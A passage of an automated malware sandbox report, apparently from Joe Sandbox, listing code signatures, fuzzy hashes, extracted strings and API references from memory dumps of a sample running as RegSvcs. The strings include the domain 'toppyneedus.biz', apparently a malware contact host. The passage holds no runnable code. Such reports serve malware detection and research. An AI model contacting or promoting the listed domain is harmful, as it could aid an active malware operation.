                                                                            • Opcode ID: 7da3e490c6c7fd60f8cfede1b933435cfc6e467f55f80a42078d60e0526c5359
                                                                            • Instruction ID: 02c3f9a59a146e89f7240041605fb1ef78a32cfd6bf7e886ec4b75bf6166d51a
                                                                            • Opcode Fuzzy Hash: 7da3e490c6c7fd60f8cfede1b933435cfc6e467f55f80a42078d60e0526c5359
                                                                            • Instruction Fuzzy Hash: E751A5B19183409BEB08DF35BC1351FBFF1AB52319F55D93DE48596263EA35C1088B4A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: "e2g$/y;{$1i4k$3a=c$5]2_
                                                                            • API String ID: 0-1179253005
                                                                            • Opcode ID: a1132d36439aa0f8af510d951a967c8b4ce46dbd379056ae19ada584c4e67a9c
                                                                            • Instruction ID: 3d13732889e8f1a23e6b25f1dd57626440b43390f58e17032a18e232b8d2887a
                                                                            • Opcode Fuzzy Hash: a1132d36439aa0f8af510d951a967c8b4ce46dbd379056ae19ada584c4e67a9c
                                                                            • Instruction Fuzzy Hash: 13F1B0B59083908BC3388F24C4923EBB7E0EF92314F19896DD8D95B391EB785545CB86
                                                                            APIs
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?), ref: 0042FE8C
                                                                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?), ref: 0042FEB8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExpandStrings
                                                                            • String ID:
                                                                            • API String ID: 237503144-0
                                                                            • Opcode ID: bf5b2209cc1f9ba5a63e132da42d33adb312844e2ac190daf82498fe7687078d
                                                                            • Instruction ID: d00ceec2c0fce3b69968d5d608354a915a71e6c1f66420e99586924d5f03d12b
                                                                            • Opcode Fuzzy Hash: bf5b2209cc1f9ba5a63e132da42d33adb312844e2ac190daf82498fe7687078d
                                                                            • Instruction Fuzzy Hash: BD519A756083149FE3108B24AC81B6F77E4EB8A728F50053EF65AD71E2DB74D80AC74A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $%-@$?%!1$G-HM$J
                                                                            • API String ID: 0-3609582815
                                                                            • Opcode ID: 4216f6c2a0eb84682d5a0986d5e31b70b7804c4afdc039273772cabce477d512
                                                                            • Instruction ID: 41722ae7b93c80e897ece3e56690120b14bb8f339630188ccd208bd426898bec
                                                                            • Opcode Fuzzy Hash: 4216f6c2a0eb84682d5a0986d5e31b70b7804c4afdc039273772cabce477d512
                                                                            • Instruction Fuzzy Hash: 8F0233B5A083908FC714DF25E85126BB7E0EF96304F08883EE9958B352E778D905CB5B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 055+$45J$$p>?8$vM/=
                                                                            • API String ID: 0-1721636607
                                                                            • Opcode ID: 0b9caad5330a5e5f8aacf4cabc7ad1fe7425e4bad1095854ec1a798a1372ee1f
                                                                            • Instruction ID: a8b56f9d4bd36846fb8f921ff30f19028837cb119b5c98d1475ead0e692a9692
                                                                            • Opcode Fuzzy Hash: 0b9caad5330a5e5f8aacf4cabc7ad1fe7425e4bad1095854ec1a798a1372ee1f
                                                                            • Instruction Fuzzy Hash: 92018CB150C3808FC7149FA98590A1BFBF9AFD6600F505C2DE0829B610D271C841CB47
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: CBA@$WTTJ$f
                                                                            • API String ID: 2994545307-3584505301
                                                                            • Opcode ID: 471c79aa972a339c07afc7ffbbc0df0251e186bc652266cee89dae87a2ea6a5b
                                                                            • Instruction ID: 137b61dc3fa8c5f2e2f17b0caabc34f636d5042226ce260bfee28ccece48d58c
                                                                            • Opcode Fuzzy Hash: 471c79aa972a339c07afc7ffbbc0df0251e186bc652266cee89dae87a2ea6a5b
                                                                            • Instruction Fuzzy Hash: E33226716083408FE718CF28C990A2FB7E2EBC5324F588A2EF49597391D678DC46CB56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CBA@$CBA@$CBA@
                                                                            • API String ID: 0-977885257
                                                                            • Opcode ID: 63df2c6c009fab2ebc170f4988e59778092359616b6bb2c1eb9db7b00abf5077
                                                                            • Instruction ID: 0e22fd21d792de0a6ff76d812d8d171c5499958ba88df0378a1bcd59b683ed89
                                                                            • Opcode Fuzzy Hash: 63df2c6c009fab2ebc170f4988e59778092359616b6bb2c1eb9db7b00abf5077
                                                                            • Instruction Fuzzy Hash: B3D16A32B483004BE314DF25D881B3BB392EBC9314F19963EE999573E1D778AC098799
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: p123$8$
                                                                            • API String ID: 0-863448269
                                                                            • Opcode ID: d120184f4dc75302dcaaef3d6d6893f4e26752d51fd4a7dc8a6eb070251236dd
                                                                            • Instruction ID: 628dd86c860a73aa692f510bedbc573b0b7889781cfd0e34a45978814ceaf45d
                                                                            • Opcode Fuzzy Hash: d120184f4dc75302dcaaef3d6d6893f4e26752d51fd4a7dc8a6eb070251236dd
                                                                            • Instruction Fuzzy Hash: F3E1EBB56083508FD720DF68D891A6BBBE0EFC5314F15882DF99987381E7B9E805CB46
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: M"B+$P"B+$^
                                                                            • API String ID: 0-2647174806
                                                                            • Opcode ID: f670a40a9f7c527bbced31516a79fc488f519e35304de4e5794fd18656af989f
                                                                            • Instruction ID: c1f0e9d935d0a44a6225e12d4782f8a97bfb7dc8895aef62576b394386038793
                                                                            • Opcode Fuzzy Hash: f670a40a9f7c527bbced31516a79fc488f519e35304de4e5794fd18656af989f
                                                                            • Instruction Fuzzy Hash: 0BB1387564C3914FD314CF2694A026FBBE2ABD1714F184D2DE4D12B382D77AC90A8B9B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 51!.$7$X
                                                                            • API String ID: 0-2385942652
                                                                            • Opcode ID: a78c88b248781559ddbc572c09bdbfe8f07451ca23c41ba2c8af2c6c11a3164a
                                                                            • Instruction ID: 8857e3f375451708e86d578520b4c04ee9ad264c3b66a97705499570122baac7
                                                                            • Opcode Fuzzy Hash: a78c88b248781559ddbc572c09bdbfe8f07451ca23c41ba2c8af2c6c11a3164a
                                                                            • Instruction Fuzzy Hash: D97156B06483818BE304CF3994907B7BBE09FE7704F18996EE0D68B391D67D9805DB56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 51!.$7$X
                                                                            • API String ID: 0-2385942652
                                                                            • Opcode ID: adc339261647e5248c9387998c40b7f1a32fbdabf1693b48aeafc3f8f468091b
                                                                            • Instruction ID: d45ce1d2a161414af144d3062688d9872793b3fe88eceec72e8e8237ec1b7c18
                                                                            • Opcode Fuzzy Hash: adc339261647e5248c9387998c40b7f1a32fbdabf1693b48aeafc3f8f468091b
                                                                            • Instruction Fuzzy Hash: 516116746487818BE318CF3994A07B7BBE09FE7304F18996EE0D187392D67D9809CB56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 51!.$7$X
                                                                            • API String ID: 0-2385942652
                                                                            • Opcode ID: 637b713e7a2816d14b6c20775ef0f9681ec8ca21c7bdd591bb93b64d199d3845
                                                                            • Instruction ID: 8994434a009838d2fcc69e65795ac711307da6a23a8bbd6ed0517962d3748a6a
                                                                            • Opcode Fuzzy Hash: 637b713e7a2816d14b6c20775ef0f9681ec8ca21c7bdd591bb93b64d199d3845
                                                                            • Instruction Fuzzy Hash: 716146B06487818BE318CF3994A07B7BBD09FE7704F18996EE0D18B391D67D9809CB56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 51!.$7$X
                                                                            • API String ID: 0-2385942652
                                                                            • Opcode ID: aecc6991fde74d393170273de7ac74ded0519ff3039fbec8cfc11f9b4caced10
                                                                            • Instruction ID: 446626223317159cfec4ab0adc3dac32f0560c3eaa94880a6e97b68444dfc219
                                                                            • Opcode Fuzzy Hash: aecc6991fde74d393170273de7ac74ded0519ff3039fbec8cfc11f9b4caced10
                                                                            • Instruction Fuzzy Hash: 3B5103B46487818BE314CF2594907B7BFE19FE7704F18996DE0D18B392D27D8809CB56
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CBA@$sq
                                                                            • API String ID: 0-929983766
                                                                            • Opcode ID: 80b3a254dacb652e91921fc69a47eac8e31b1ecc1cc69e30c4ef8d5ec4495ba2
                                                                            • Instruction ID: 9ef229e294d88d261b043eed9336732b6cab67dac8f228f710879973ad9a8f59
                                                                            • Opcode Fuzzy Hash: 80b3a254dacb652e91921fc69a47eac8e31b1ecc1cc69e30c4ef8d5ec4495ba2
                                                                            • Instruction Fuzzy Hash: 3552E2746082009BE7049F28DC61BAB73E1FB86314F14493EE596C72E1E738DD99CB5A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: -N!L$MJ
                                                                            • API String ID: 0-3350035189
                                                                            • Opcode ID: 0a4960dea8544ab6bd350d978555311752edc4d51b9eacaf1ea7b955d4a743f6
                                                                            • Instruction ID: 9de70bf2243983c411433730edc76d08519779103d1fe7f16fa6560b8bfbbdd8
                                                                            • Opcode Fuzzy Hash: 0a4960dea8544ab6bd350d978555311752edc4d51b9eacaf1ea7b955d4a743f6
                                                                            • Instruction Fuzzy Hash: 466120746583158BD314DF14C89266BB7B2EFC2704F48897DE8818B391F3789A0ACB5A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RSD
                                                                            • API String ID: 0-1885251794
                                                                            • Opcode ID: 47bd2742555233e9e5c4025bf328f478542c394570e253370a66814c1c527361
                                                                            • Instruction ID: 7cfa41fa9488b58a04adbb645cbcf41f23a80125f701e883b4f937cca3fc9d36
                                                                            • Opcode Fuzzy Hash: 47bd2742555233e9e5c4025bf328f478542c394570e253370a66814c1c527361
                                                                            • Instruction Fuzzy Hash: C012153AA18251CFD704DF38E8A026BB3E2FB8A315F1A887DD985C7251D734E945CB45
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RSD
                                                                            • API String ID: 0-1885251794
                                                                            • Opcode ID: 74c3bf62c54b5152b8021bcd38fcc9cc803d775925d9e0ab2c15162994bc840c
                                                                            • Instruction ID: f3586e3188a8b46c9ac091c72099f3f57b33748e14ee24a23092896341e5aa46
                                                                            • Opcode Fuzzy Hash: 74c3bf62c54b5152b8021bcd38fcc9cc803d775925d9e0ab2c15162994bc840c
                                                                            • Instruction Fuzzy Hash: 3E021236A18650CFD704DF38E8A026BB3E2FBCA315F1A887ED985C7251D634E845CB45
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RSD
                                                                            • API String ID: 0-1885251794
                                                                            • Opcode ID: 9ec10cc7bf7d01c9eb7f617776b572a6860f7f8ffbced55ed26ac1a69a93af78
                                                                            • Instruction ID: e10367c3f738c0d96199f2d4c6b66688af40efb1ca2a131273924844825db8d9
                                                                            • Opcode Fuzzy Hash: 9ec10cc7bf7d01c9eb7f617776b572a6860f7f8ffbced55ed26ac1a69a93af78
                                                                            • Instruction Fuzzy Hash: FD020136A18650CFD704DF38E8A026BB3E2FBCA315F1A887ED986C7251D634E945CB45
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RSD
                                                                            • API String ID: 0-1885251794
                                                                            • Opcode ID: e7ee684879238f534607cea00745cdb54296e725014418c645e1e3a6983e7a3d
                                                                            • Instruction ID: 122a5a9923ece72c9af32b0a600d0c28ce8cb0fd50cc7e2a5ef79129f2a71d53
                                                                            • Opcode Fuzzy Hash: e7ee684879238f534607cea00745cdb54296e725014418c645e1e3a6983e7a3d
                                                                            • Instruction Fuzzy Hash: E502F236A18650CFD704DF38E8A026BB3E2FBCA315F1A887ED986C7251D634E945CB45
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: CBA@
                                                                            • API String ID: 2994545307-1145392821
                                                                            • Opcode ID: 801f7fc453b434b6d0769aa98ea7f04e40a009c0ce721f034b15321fe0fd40ce
                                                                            • Instruction ID: 00a1d3775a937c3993ec04762b0a604b3e37cf2e01ec6315b78509429d666341
                                                                            • Opcode Fuzzy Hash: 801f7fc453b434b6d0769aa98ea7f04e40a009c0ce721f034b15321fe0fd40ce
                                                                            • Instruction Fuzzy Hash: A2E146315083508BD728CF28D8927FBB7E2EBC6314F18856ED5D597291DB389982C7C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CBA@
                                                                            • API String ID: 0-1145392821
                                                                            • Opcode ID: 900739d2d67e5b5430037e9ffed0e81f8f3362a1ecb5610589860624d101abae
                                                                            • Instruction ID: e3053ba91d9d4722d69e9ba27e4c9be176668055139d653f889e29539a9c1df9
                                                                            • Opcode Fuzzy Hash: 900739d2d67e5b5430037e9ffed0e81f8f3362a1ecb5610589860624d101abae
                                                                            • Instruction Fuzzy Hash: 16A14A71B0822057DB18EB249C5263BB7E1EF91354F99896EF886D7381F33C9905C35A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RSD
                                                                            • API String ID: 0-1885251794
                                                                            • Opcode ID: 4630037c3b4f16b3db17567cd603cdde4bbf4b4851b2ca4f75decf42d615f9e4
                                                                            • Instruction ID: 0e4e66426864946afa7c0803a79320b70aea1013596dc46c5b46efda672c4e53
                                                                            • Opcode Fuzzy Hash: 4630037c3b4f16b3db17567cd603cdde4bbf4b4851b2ca4f75decf42d615f9e4
                                                                            • Instruction Fuzzy Hash: CEC10E36A18750CFD704DF38E89026BB7E2FB8A314F1A887ED985C7252E634E905CB45
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: "
                                                                            • API String ID: 0-123907689
                                                                            • Opcode ID: 9635e65c21c6889c0b09692e5d3a20b379e51d181c86f62a29b04be41968d655
                                                                            • Instruction ID: c6cb6473e166a6a1cae5d153f5a92795014ff270fbe499a74eb7cc308c6dc8c6
                                                                            • Opcode Fuzzy Hash: 9635e65c21c6889c0b09692e5d3a20b379e51d181c86f62a29b04be41968d655
                                                                            • Instruction Fuzzy Hash: 2AC157B2A083105FD714CE25C49176BB7E9AB89350F189A2FE89587391D73CEC09C7CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: QK_<
                                                                            • API String ID: 0-1014425830
                                                                            • Opcode ID: 064de6e83512b03b8920eea2b5ead36d7a61c7f67b76d35f13894e8ef61a3fdb
                                                                            • Instruction ID: 10c32d940ca069f3ca0d4ad0cc50da3774e75a5b9475e2d0db297e612348f058
                                                                            • Opcode Fuzzy Hash: 064de6e83512b03b8920eea2b5ead36d7a61c7f67b76d35f13894e8ef61a3fdb
                                                                            • Instruction Fuzzy Hash: 44611175A083608AC714CF25D891667BBE1EFDA310F48855EE4C28B396E7789C05CB96
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CBA@
                                                                            • API String ID: 0-1145392821
                                                                            • Opcode ID: ee95a738d7dd201fede08b4d4b466d0a204790de6f22f1b66ab2fa8ae6717529
                                                                            • Instruction ID: 2c0833a1070fb715299ea0f7b8ed6c0077dd7fb37e00021935a3e20847151a89
                                                                            • Opcode Fuzzy Hash: ee95a738d7dd201fede08b4d4b466d0a204790de6f22f1b66ab2fa8ae6717529
                                                                            • Instruction Fuzzy Hash: BC5127756093009FD728DF24C8516ABB7F1FF86314F08896EE88597391EB389850CB86
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: mbc
                                                                            • API String ID: 0-3605395232
                                                                            • Opcode ID: cd020dcaca68d8c7efce80131ab2a2b1077f63d48d7b421cd023e636f5be2f86
                                                                            • Instruction ID: c707b1fdf4c197c88128dfd17f6cc55b2d27033825e0a2f3f4385da6b53688be
                                                                            • Opcode Fuzzy Hash: cd020dcaca68d8c7efce80131ab2a2b1077f63d48d7b421cd023e636f5be2f86
                                                                            • Instruction Fuzzy Hash: 6631D571A082009BE708DF28C954B2FF7E1BBC6714F58C92EE48597244D3BDD9468B9A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: toppyneedus.biz
                                                                            • API String ID: 0-1318037778
                                                                            • Opcode ID: 866067ea8b6d25e48e586b60208ec48b4e6e2469098e3cbea04eff5a7501ee78
                                                                            • Instruction ID: ec4d0669c556db09767864a2200042a921757abea953f7d6095fd373d4e98f3a
                                                                            • Opcode Fuzzy Hash: 866067ea8b6d25e48e586b60208ec48b4e6e2469098e3cbea04eff5a7501ee78
                                                                            • Instruction Fuzzy Hash: 09F0AF29A0811586C7188F54C8A1373B2B1FF86350B04947BEC83A7B99F77C9C09E75E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: CBA@
                                                                            • API String ID: 2994545307-1145392821
                                                                            • Opcode ID: 5a0c7249889e4a93c58d4a641c4a64c8f9872d01d569578c8bb9795b2bb51817
                                                                            • Instruction ID: 09ad8aee62d3c20d21d062b8474832d877d0b06331463a38a517a7d65a326111
                                                                            • Opcode Fuzzy Hash: 5a0c7249889e4a93c58d4a641c4a64c8f9872d01d569578c8bb9795b2bb51817
                                                                            • Instruction Fuzzy Hash: 3BF0A77060C2104BE304DB28A955937F7E5DB47338F545A1DE5AAA72D2D228AC56870A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: baae5f0e30978c621d64719c1dfbab92b3e01a22dcb1dc03645422f7419631c9
                                                                            • Instruction ID: 45f85c51ffb39c1c35df02cc71f6c2b8cd25caf0d8e2108a05e41e46f584b8b2
                                                                            • Opcode Fuzzy Hash: baae5f0e30978c621d64719c1dfbab92b3e01a22dcb1dc03645422f7419631c9
                                                                            • Instruction Fuzzy Hash: 0622A4726083118BC725DE18D9406ABB3E1FFC4319F19893ED986A73C5D738A8658B47
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a21693e68d6c2dc68f3771ac8f6abb2374044a033a8a55580f35bfe2aebe3a52
                                                                            • Instruction ID: fba20f1fd1809ee57f04a952d383ac98b277ec697ebd25121fed1e7f698519ed
                                                                            • Opcode Fuzzy Hash: a21693e68d6c2dc68f3771ac8f6abb2374044a033a8a55580f35bfe2aebe3a52
                                                                            • Instruction Fuzzy Hash: A222BBB5A083418FC364CF29C480A9AFBE1BFC8714F55892EE999D7311E770E9458F86
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e2f57fe3b9f43da44e84c3b486574c5795c1a4486e36e252ce4a529013125e2a
                                                                            • Instruction ID: c0beae02e2afb8fc3f7bd56478010165f8edd20768fc1a93718a7573f6d62d31
                                                                            • Opcode Fuzzy Hash: e2f57fe3b9f43da44e84c3b486574c5795c1a4486e36e252ce4a529013125e2a
                                                                            • Instruction Fuzzy Hash: 02C10F36A18350CFD704DF39E89026BB7E2FBCA311F1A887ED989C7251E634D9468B45
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dafbec1d464ecd5e00f246eb6c6bf53cc65ae8098bb7db74f9c6550991923cc6
                                                                            • Instruction ID: b693ec94dd037d92688a7630cfde83b878ce35c756758b36ad83687ce2c4efd1
                                                                            • Opcode Fuzzy Hash: dafbec1d464ecd5e00f246eb6c6bf53cc65ae8098bb7db74f9c6550991923cc6
                                                                            • Instruction Fuzzy Hash: F0A16B72B483208BD318CF24D89276BB3E1EFE5310F49D56DE8859B391E7789905C74A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 28b8e8adf88234984df0464e0f51b7bd8c391eb7f3dde45b96e1c36b640d3c84
                                                                            • Instruction ID: 7cdd8ca2d8075aafc66ab920a3b68e0b8f1e5beb512974ecdfb5d9a624332584
                                                                            • Opcode Fuzzy Hash: 28b8e8adf88234984df0464e0f51b7bd8c391eb7f3dde45b96e1c36b640d3c84
                                                                            • Instruction Fuzzy Hash: 1D61F1B1A0C3108BD704DF24E89122BB7B2EFE2358F18892DE4C59B391E739D506C75A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.1520058217.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 23e122f10f744cb6c9b0bc1563ed4165fd24b61414c2aefdeb7ef4d7599abf8f
                                                                            • Instruction ID: 8f81dde8399a6a75da52ab65edcef000bfbae5987a417ba31876f76159fa0020
